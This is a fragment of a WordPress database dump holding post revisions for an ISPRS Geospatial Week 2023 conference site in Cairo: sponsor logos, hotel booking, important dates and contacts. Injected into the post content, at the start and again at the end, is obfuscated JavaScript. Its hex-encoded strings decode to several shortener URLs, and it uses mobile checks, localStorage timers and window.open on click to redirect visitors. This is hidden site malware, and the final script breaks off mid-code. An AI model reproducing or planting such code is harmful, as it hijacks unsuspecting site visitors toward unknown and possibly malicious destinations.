Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-14 14:35:28','2023-06-14 14:35:28','',3066,'https://gsw2023.com/?p=4705',0,'revision','',0),
(4707,1,'2023-06-18 13:31:38','2023-06-18 13:31:38','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else 